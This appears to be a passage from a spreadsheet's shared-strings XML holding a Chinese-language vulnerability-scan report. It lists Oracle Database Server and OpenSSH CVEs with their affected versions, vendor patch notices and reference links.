    <t>http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6454
https://www.cnvd.org.cn/flaw/show/CNVD-2014-07126</t>
  </si>
  <si>
    <t>Oracle Database Server SQLJ组件代码执行漏洞(CVE-2014-6455)</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpuoct2014verbose.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6455
https://www.cnvd.org.cn/flaw/show/CNVD-2014-07218
http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html</t>
  </si>
  <si>
    <t>Oracle Database Server Java VM组件拒绝服务漏洞(CVE-2014-6537)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6537
https://www.cnvd.org.cn/flaw/show/CNVD-2014-07263</t>
  </si>
  <si>
    <t>Oracle Database Server JDBC组件安全漏洞(CVE-2014-6544)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6544
https://www.cnvd.org.cn/flaw/show/CNVD-2014-07132</t>
  </si>
  <si>
    <t>Oracle Database Server Java VM组件代码执行漏洞(CVE-2014-6545)</t>
  </si>
  <si>
    <t>Oracle Database Server JPublisher组件代码执行漏洞(CVE-2014-6546)</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpuoct2014verbose.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6546
https://www.cnvd.org.cn/flaw/show/CNVD-2014-06961</t>
  </si>
  <si>
    <t>Oracle Database Server Java VM组件代码执行漏洞(CVE-2014-6560)</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpuoct2014verbose.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6560
https://www.cnvd.org.cn/flaw/show/CNVD-2014-06796
http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html</t>
  </si>
  <si>
    <t>Oracle Database Server XDK and XDB - XML Database组件安全漏洞(CVE-2015-0479)</t>
  </si>
  <si>
    <t>影响oracle:11.2.0.3版本,11.2.0.4版本,12.1.0.1版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接： http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0479
https://www.cnvd.org.cn/flaw/show/CNVD-2015-02522</t>
  </si>
  <si>
    <t>Oracle Database Server Core RDBMS组件安全漏洞(CVE-2015-0483)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html
http://secunia.com/advisories/64073
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0483
https://www.cnvd.org.cn/flaw/show/CNVD-2015-02521</t>
  </si>
  <si>
    <t>Oracle Enterprise Manager Grid Control Enterprise Manager for Oracle Database组件安全漏洞(CVE-2015-2647)</t>
  </si>
  <si>
    <t>影响oracle:12.1.0.5版本,12.1.0.6版本,12.1.0.7版本,11.1.0.7版本,11.2.0.3版本,11.2.0.4版本,11.1.0.1版本</t>
  </si>
  <si>
    <t>Oracle Enterprise Manager Grid Control Enterprise Manager for Oracle Database组件安全漏洞(CVE-2015-4735)</t>
  </si>
  <si>
    <t>影响oracle:11.2.0.3版本,11.2.0.4版本</t>
  </si>
  <si>
    <t>Oracle Database本地安全漏洞(CVE-2015-4753)</t>
  </si>
  <si>
    <t>Oracle Database Server远程安全漏洞(CVE-2015-4873)</t>
  </si>
  <si>
    <t>Oracle Database Server Java VM组件安全漏洞(CVE-2015-4888)</t>
  </si>
  <si>
    <t>Oracle Database Server远程安全漏洞(CVE-2015-4796)</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpuoct2015verbose.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4796
https://www.cnvd.org.cn/flaw/show/CNVD-2015-06942</t>
  </si>
  <si>
    <t>Oracle Database Server远程安全漏洞(CVE-2015-4863)</t>
  </si>
  <si>
    <t>Oracle Database Server XML Developer's Kit for C组件安全漏洞(CVE-2015-4923)</t>
  </si>
  <si>
    <t>Oracle Enterprise Manager Grid Control Enterprise Manager Base Platform组件安全漏洞(CVE-2016-0444)</t>
  </si>
  <si>
    <t>Oracle Enterprise Manager Grid Control Enterprise Manager Base Platform组件安全漏洞(CVE-2016-0446)</t>
  </si>
  <si>
    <t>Oracle Database Server XDB - XML Database组件安全漏洞(CVE-2016-0461)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html</t>
  </si>
  <si>
    <t>Oracle Database Server Real Application Clusters远程安全漏洞(CVE-2016-2183)</t>
  </si>
  <si>
    <t>厂商补丁：Oracle已经为此发布了一个安全公告（cpujul2017-3236622）以及相应补丁: cpujul2017-3236622：Oracle Critical Patch Update Advisory - July 2017 链接：http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html</t>
  </si>
  <si>
    <t>Oracle Database Server Portable Clusterware远程安全漏洞(CVE-2016-3479)</t>
  </si>
  <si>
    <t>厂商补丁：Oracle已经为此发布了一个安全公告（cpujul2016-2881720）以及相应补丁: cpujul2016-2881720：Oracle Critical Patch Update Advisory - July 2016 链接：http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujul2016verbose.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3479
https://www.cnvd.org.cn/flaw/show/CNVD-2016-05189
https://www.oracle.com/security-alerts/cpujul2016.html#AppendixDB</t>
  </si>
  <si>
    <t>Oracle Database Server OJVM远程安全漏洞(CVE-2016-3609)</t>
  </si>
  <si>
    <t>厂商补丁: Oracle已经为此发布了一个安全公告（cpujul2016-2881720）以及相应补丁: cpujul2016-2881720：Oracle Critical Patch Update Advisory - July 2016 链接：http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html</t>
  </si>
  <si>
    <t>Oracle Database Server本地安全漏洞(CVE-2016-5499)</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------Oracle已经为此发布了一个安全公告（cpuoct2016-2881722）以及相应补丁:cpuoct2016-2881722：Oracle Critical Patch Update Advisory - October 2016链接：http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html</t>
  </si>
  <si>
    <t>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5499
https://www.cnvd.org.cn/flaw/show/CNVD-2016-09696</t>
  </si>
  <si>
    <t>Oracle Database Server 本地安全漏洞（CVE-2017-10190）</t>
  </si>
  <si>
    <t>影响oracle:11.2.0.4版本,12.2.0.1版本,12.1.0.2版本</t>
  </si>
  <si>
    <t>厂商补丁: Oracle已经为此发布了一个安全公告（cpuoct2017-3236626）以及相应补丁: cpuoct2017-3236626：Oracle Critical Patch Update Advisory - October 2017 链接：http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpuoct2017verbose.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10190
https://www.cnvd.org.cn/flaw/show/CNVD-2017-30893</t>
  </si>
  <si>
    <t>Oracle Database Server Data Pump Import本地安全漏洞(CVE-2016-3489)</t>
  </si>
  <si>
    <t>厂商补丁:Oracle------Oracle已经为此发布了一个安全公告（cpujul2016-2881720）以及相应补丁:cpujul2016-2881720：Oracle Critical Patch Update Advisory - July 2016链接：http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html</t>
  </si>
  <si>
    <t>Oracle Database Server本地安全漏洞(CVE-2016-5498)</t>
  </si>
  <si>
    <t>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5498
https://www.cnvd.org.cn/flaw/show/CNVD-2016-09794</t>
  </si>
  <si>
    <t>Oracle Database Server本地安全漏洞(CVE-2016-5505)</t>
  </si>
  <si>
    <t>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5505
https://www.cnvd.org.cn/flaw/show/CNVD-2016-09904</t>
  </si>
  <si>
    <t>Oracle Database Server远程安全漏洞(CVE-2015-4900)</t>
  </si>
  <si>
    <t>Oracle Database Server Database Vault组件安全漏洞(CVE-2015-4921)</t>
  </si>
  <si>
    <t>Oracle Database Server Workspace Manager组件安全漏洞(CVE-2015-4925)</t>
  </si>
  <si>
    <t>影响oracle:11.2.0.4版本</t>
  </si>
  <si>
    <t>Oracle Enterprise Manager Grid Control Enterprise Manager Base Platform组件安全漏洞(CVE-2016-0411)</t>
  </si>
  <si>
    <t>影响oracle:11.2.0.4版本,11.1.0.1版本</t>
  </si>
  <si>
    <t>Oracle Enterprise Manager Grid Control Enterprise Manager Base Platform组件安全漏洞(CVE-2016-0427)</t>
  </si>
  <si>
    <t>Oracle Enterprise Manager Grid Control Enterprise Manager Base Platform组件安全漏洞(CVE-2016-0445)</t>
  </si>
  <si>
    <t>Oracle Enterprise Manager Grid Control Enterprise Manager Base Platform组件安全漏洞(CVE-2016-0447)</t>
  </si>
  <si>
    <t>Oracle Enterprise Manager Grid Control Enterprise Manager Base Platform组件安全漏洞(CVE-2016-0455)</t>
  </si>
  <si>
    <t>Oracle Database Server Security组件安全漏洞(CVE-2016-0467)</t>
  </si>
  <si>
    <t>Oracle Database Server XDB - XML Database组件安全漏洞(CVE-2016-0472)</t>
  </si>
  <si>
    <t>Oracle Enterprise Manager Grid Control Enterprise Manager for Oracle Database组件安全漏洞(CVE-2016-0681)</t>
  </si>
  <si>
    <t>厂商补丁：目前Oracle厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html</t>
  </si>
  <si>
    <t>Oracle Database Server RDBMS Security组件安全漏洞(CVE-2016-0690)</t>
  </si>
  <si>
    <t>Oracle Database Server Java VM组件安全漏洞(CVE-2016-3454)</t>
  </si>
  <si>
    <t>厂商补丁：Oracle已经为此发布了一个安全公告（cpuapr2016v3-2985753）以及相应补丁: cpuapr2016v3-2985753：Oracle Critical Patch Update Advisory - April 2016  链接：http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html</t>
  </si>
  <si>
    <t>Oracle Database Server Database Vault本地安全漏洞(CVE-2016-3484)</t>
  </si>
  <si>
    <t>Oracle Database Server JDBC远程安全漏洞(CVE-2016-3506)</t>
  </si>
  <si>
    <t>厂商补丁: Oracle已经为此发布了一个安全公告（cpujul2016-2881720）以及相应补丁: cpujul2016-2881720：Oracle Critical Patch Update Advisory - July 2016  链接：http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html</t>
  </si>
  <si>
    <t>Oracle Database Server远程安全漏洞(CVE-2016-3562)</t>
  </si>
  <si>
    <t>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3562
https://www.cnvd.org.cn/flaw/show/CNVD-2016-09793</t>
  </si>
  <si>
    <t>Oracle Database Server远程安全漏洞(CVE-2016-5555)</t>
  </si>
  <si>
    <t>厂商补丁：Oracle已经为此发布了一个安全公告（cpuoct2016-2881722）以及相应补丁:cpuoct2016-2881722：Oracle Critical Patch Update Advisory - October 2016链接：http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html</t>
  </si>
  <si>
    <t>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5555
https://www.cnvd.org.cn/flaw/show/CNVD-2016-09796</t>
  </si>
  <si>
    <t>Oracle Database Server OJVM 本地安全漏洞(CVE-2017-10202)</t>
  </si>
  <si>
    <t>影响oracle:11.2.0.4版本,12.1.0.2版本,12.2.0.1版本</t>
  </si>
  <si>
    <t>厂商补丁：Oracle已经为此发布了一个安全公告（cpujul2017-3236622）以及相应补丁: cpujul2017-3236622：Oracle Critical Patch Update Advisory - July 2017  链接：http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html</t>
  </si>
  <si>
    <t>Oracle Database Server 本地安全漏洞（CVE-2017-10261）</t>
  </si>
  <si>
    <t>厂商补丁:Oracle------Oracle已经为此发布了一个安全公告（cpuoct2017-3236626）以及相应补丁:cpuoct2017-3236626：Oracle Critical Patch Update Advisory - October 2017链接：http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html</t>
  </si>
  <si>
    <t>Oracle Database Server OJVM 本地安全漏洞 (CVE-2017-3310)</t>
  </si>
  <si>
    <t>厂商补丁：Oracle已经为此发布了一个安全公告（cpujan2017-2881727）以及相应补丁:cpujan2017-2881727：Oracle Critical Patch Update Advisory - January 2017链接：http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html</t>
  </si>
  <si>
    <t>Oracle Database Server远程安全漏洞(CVE-2017-3486)</t>
  </si>
  <si>
    <t>厂商补丁：Oracle已经为此发布了一个安全公告（cpuapr2017-3236618）以及相应补丁:cpuapr2017-3236618：Oracle Critical Patch Update Advisory - April 2017链接：http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html</t>
  </si>
  <si>
    <t>Oracle Database Server Java VM组件安全漏洞(CVE-2018-2841)</t>
  </si>
  <si>
    <t>影响oracle:11.2.0.4版本,12.1.0.2版本,12.2.0.1版本,18.1.0.0版本</t>
  </si>
  <si>
    <t>厂商补丁: Oracle已经为此发布了一个安全公告（cpuapr2018-3678067）以及相应补丁: cpuapr2018-3678067：Oracle Critical Patch Update April 2018  链接：http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpuapr2018verbose.html
http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html</t>
  </si>
  <si>
    <t>Oracle Database Server 缓冲区错误漏洞(CVE-2019-12900)</t>
  </si>
  <si>
    <t>影响oracle:11.2.0.4版本,12.2.0.1版本,12.1.0.2版本,18.0.0.0版本(含)到20.0.0.0版本</t>
  </si>
  <si>
    <t>厂商补丁: 目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpuoct2020.html</t>
  </si>
  <si>
    <t>Oracle Database Server Java VM组件 远程安全漏洞(CVE-2019-2749)</t>
  </si>
  <si>
    <t>影响oracle:11.2.0.4版本,12.1.0.2版本,12.2.0.1版本,18.0.0.0版本(含)到20.0.0.0版本</t>
  </si>
  <si>
    <t>厂商补丁:Oracle------Oracle已经为此发布了一个安全公告（cpujul2019-5072835）以及相应补丁:cpujul2019-5072835：Oracle Critical Patch Update Advisory - July 2019链接：https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujul2019verbose.html</t>
  </si>
  <si>
    <t>Oracle Database Server Text 组件安全漏洞(CVE-2019-2853)</t>
  </si>
  <si>
    <t>厂商补丁：目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuapr2020.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpuapr2020.html</t>
  </si>
  <si>
    <t>Oracle Database Server Core RDBMS组件安全漏洞(CVE-2019-2954)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html</t>
  </si>
  <si>
    <t>Oracle Database Server Core RDBMS组件安全漏洞(CVE-2019-2955)</t>
  </si>
  <si>
    <t>Oracle Database Server Scheduler component 安全漏洞(CVE-2020-14735)</t>
  </si>
  <si>
    <t>Oracle Database Server 权限许可和访问控制问题漏洞(CVE-2020-14742)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.oracle.com/security-alerts/cpuoct2020.html</t>
  </si>
  <si>
    <t>Oracle Database Server Java VM component 安全漏洞(CVE-2020-14743)</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpuoct2020verbose.html</t>
  </si>
  <si>
    <t>Oracle Database Server Java VM组件安全漏洞(CVE-2020-2518)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpujan2020.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujan2020verbose.html
https://www.oracle.com/security-alerts/cpujan2020.html</t>
  </si>
  <si>
    <t>Oracle Database Server Java VM组件安全漏洞(CVE-2020-2735)</t>
  </si>
  <si>
    <t>厂商补丁: 目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuapr2020.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpuapr2020verbose.html
https://www.oracle.com/security-alerts/cpuapr2020.html</t>
  </si>
  <si>
    <t>Oracle Database Server Core RDBMS组件安全漏洞(CVE-2018-2575)</t>
  </si>
  <si>
    <t>厂商补丁:Oracle------Oracle已经为此发布了一个安全公告（cpujan2018-3236628）以及相应补丁:cpujan2018-3236628：Oracle Critical Patch Update January 2018链接：http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujan2018verbose.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2575
https://www.cnvd.org.cn/flaw/show/CNVD-2018-02351</t>
  </si>
  <si>
    <t>Oracle Database Server Core RDBMS组件安全漏洞(CVE-2018-2939)</t>
  </si>
  <si>
    <t>影响oracle:11.2.0.4版本,12.1.0.2版本,12.2.0.1版本,18.1.0.0版本,18.2.0.0版本</t>
  </si>
  <si>
    <t>厂商补丁：目前厂商已发布升级补丁以修复漏洞，补丁获取链接：http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujul2018verbose.html
http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html</t>
  </si>
  <si>
    <t>Oracle Database Server Java VM组件安全漏洞(CVE-2018-3110)</t>
  </si>
  <si>
    <t>影响oracle:11.2.0.4版本,12.1.0.2版本,12.2.0.1版本,18.0.0.0版本(含)到19.0.0.0版本</t>
  </si>
  <si>
    <t>厂商补丁：目前厂商已发布升级补丁以修复漏洞，补丁获取链接：http://www.oracle.com/technetwork/security-advisory/alert-cve-2018-3110-5032149.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/alert-cve-2018-3110-verbose.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3110
https://www.cnvd.org.cn/flaw/show/CNVD-2018-15187
http://www.oracle.com/technetwork/security-advisory/alert-cve-2018-3110-5032149.html</t>
  </si>
  <si>
    <t>Oracle Database Server Text 组件安全漏洞(CVE-2018-3299)</t>
  </si>
  <si>
    <t>厂商补丁：目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html</t>
  </si>
  <si>
    <t>Oracle Database Server Text 组件安全漏洞(CVE-2018-7489)</t>
  </si>
  <si>
    <t>ips-11024502, ips-11024503（有效）</t>
  </si>
  <si>
    <t>厂商补丁：目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2018.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpuoct2018.html</t>
  </si>
  <si>
    <t>Oracle Database Server 远程安全漏洞 (CVE-2019-2518)</t>
  </si>
  <si>
    <t>影响oracle:12.1.0.2版本,12.2.0.1版本,11.2.0.4版本,18.0.0.0版本(含)到20.0.0.0版本</t>
  </si>
  <si>
    <t>厂商补丁: Oracle已经为此发布了一个安全公告（April 2019）以及相应补丁: April 2019：Oracle Critical Patch Update Advisory - April 2019  链接：https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpuapr2019verbose.html
https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html</t>
  </si>
  <si>
    <t>Oracle Database Server Text 组件访问控制错误漏洞(CVE-2019-2753)</t>
  </si>
  <si>
    <t>Oracle Database Server Text 组件安全漏洞(CVE-2019-2756)</t>
  </si>
  <si>
    <t>Oracle Database Server Text 组件安全漏洞(CVE-2019-2759)</t>
  </si>
  <si>
    <t>Oracle Database Server SQL Developer Install component 安全漏洞(CVE-2020-14740)</t>
  </si>
  <si>
    <t>Oracle Database Server Database Gateway for ODBC组件安全漏洞(CVE-2020-2517)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.oracle.com/security-alerts/cpujan2020.html</t>
  </si>
  <si>
    <t>Oracle Database Server Data Pump组件安全漏洞(CVE-2020-2969)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.oracle.com/security-alerts/cpujul2020.html</t>
  </si>
  <si>
    <t>Oracle Application Server 组件Oracle BPEL Process Manager 未明访问控制安全漏洞</t>
  </si>
  <si>
    <t>ips-11021948（有效）</t>
  </si>
  <si>
    <t>影响oracle:1.0版本(含)到12版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html?_template=/o</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200901-139</t>
  </si>
  <si>
    <t>Oracle Logical Standby组件未明漏洞</t>
  </si>
  <si>
    <t>影响oracle:19c以下版本</t>
  </si>
  <si>
    <t>厂商已经发布了更新程序修补漏洞。有关更新程序的更多信息，请查看以下链接：    https://www.oracle.com/security-alerts/cpujan2010.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujan2010.html</t>
  </si>
  <si>
    <t>Oracle Database Server 本地安全漏洞（CVE-2017-10292）</t>
  </si>
  <si>
    <t>Oracle Database Server 本地安全漏洞（CVE-2017-10321）</t>
  </si>
  <si>
    <t>厂商补丁: Oracle已经为此发布了一个安全公告（cpuoct2017-3236626）以及相应补丁: cpuoct2017-3236626：Oracle Critical Patch Update Advisory - October 2017  链接：http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html</t>
  </si>
  <si>
    <t>Oracle Database Server远程安全漏洞(CVE-2017-3567)</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------Oracle已经为此发布了一个安全公告（cpuapr2017-3236618）以及相应补丁:cpuapr2017-3236618：Oracle Critical Patch Update Advisory - April 2017链接：http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html</t>
  </si>
  <si>
    <t>Oracle Database Server Core RDBMS 组件访问控制错误漏洞(CVE-2018-11058)</t>
  </si>
  <si>
    <t>厂商补丁: Oracle已经为此发布了一个安全公告（cpujul2019-5072835）以及相应补丁:cpujul2019-5072835：Oracle Critical Patch Update Advisory - July 2019  链接：https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujul2019.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11058
https://seclists.org/fulldisclosure/2018/Aug/46
https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html</t>
  </si>
  <si>
    <t>Oracle Database Server Java VM组件安全漏洞(CVE-2018-2680)</t>
  </si>
  <si>
    <t>厂商补丁: Oracle已经为此发布了一个安全公告（cpujan2018-3236628）以及相应补丁: cpujan2018-3236628：Oracle Critical Patch Update January 2018  链接：http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html</t>
  </si>
  <si>
    <t>Oracle Database Server Java VM组件安全漏洞(CVE-2018-3004)</t>
  </si>
  <si>
    <t>影响oracle:11.2.0.4版本,12.1.0.2版本,12.2.0.1版本,18.2.0.0版本</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujul2018verbose.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3004
https://www.cnvd.org.cn/flaw/show/CNVD-2018-24126</t>
  </si>
  <si>
    <t>Oracle Database Server Java VM 组件安全漏洞(CVE-2018-3259)</t>
  </si>
  <si>
    <t>Oracle Database Server 安全漏洞(CVE-2019-2547)</t>
  </si>
  <si>
    <t>厂商补丁:Oracle------Oracle已经为此发布了一个安全公告（cpujan2019-5072801）以及相应补丁:cpujan2019-5072801：Oracle Critical Patch Update Advisory - January 2019链接：https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujan2019verbose.html</t>
  </si>
  <si>
    <t>Oracle Database Server Core RDBMS 组件访问控制错误漏洞(CVE-2019-2569)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html</t>
  </si>
  <si>
    <t>Oracle Database Server 远程安全漏洞(CVE-2019-2799)</t>
  </si>
  <si>
    <t>影响oracle:12.1.0.2版本,11.2.0.4版本,12.2.0.1版本,18.0.0.0版本(含)到19.0.0.0版本</t>
  </si>
  <si>
    <t>厂商补丁: Oracle已经为此发布了一个安全公告（cpujul2019-5072835）以及相应补丁: cpujul2019-5072835：Oracle Critical Patch Update Advisory - July 2019  链接：https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujul2019verbose.html
https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html</t>
  </si>
  <si>
    <t>Oracle Database Server Text 组件安全漏洞(CVE-2019-2852)</t>
  </si>
  <si>
    <t>Oracle Database Server Java VM组件安全漏洞(CVE-2019-2909)</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpuoct2019verbose.html</t>
  </si>
  <si>
    <t>Oracle Database Server  跨站脚本漏洞(CVE-2020-11023)</t>
  </si>
  <si>
    <t>Oracle Database Server Oracle Text component 安全漏洞(CVE-2020-14734)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
  </si>
  <si>
    <t>Oracle Database Server 安全漏洞(CVE-2020-14736)</t>
  </si>
  <si>
    <t>Oracle Database Server Database Filesystem component 安全漏洞(CVE-2020-14741)</t>
  </si>
  <si>
    <t>Oracle Database Server Core RDBMS组件安全漏洞(CVE-2020-2510)</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujan2020.html</t>
  </si>
  <si>
    <t>Oracle Database Server Core RDBMS组件安全漏洞(CVE-2020-2737)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.oracle.com/security-alerts/cpuapr2020.html</t>
  </si>
  <si>
    <t>Oracle Database 组件SQL*Plus Windows GUI 未明安全漏洞</t>
  </si>
  <si>
    <t>影响oracle:10.1.0.5版本(含)到12版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200901-130</t>
  </si>
  <si>
    <t>Oracle Database Server Portable Clusterware 组件安全漏洞(CVE-2019-2516)</t>
  </si>
  <si>
    <t>厂商补丁: 目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html</t>
  </si>
  <si>
    <t>Oracle Database Server RDBMS DataPump 安全漏洞(CVE-2019-2571)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.oracle.com/technetwork/security-advisory/cpuapr2019verbose-5072824.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpuapr2019verbose.html</t>
  </si>
  <si>
    <t>OpenSSH 输入验证错误漏洞 (CVE-2019-6111)</t>
  </si>
  <si>
    <t>OpenSSH: 5.3</t>
  </si>
  <si>
    <t>影响OpenSSH:7.9以下版本(含)</t>
  </si>
  <si>
    <t>参见《OpenSSH 输入验证错误漏洞 (CVE-2019-6111)-修复方案》</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201901-767
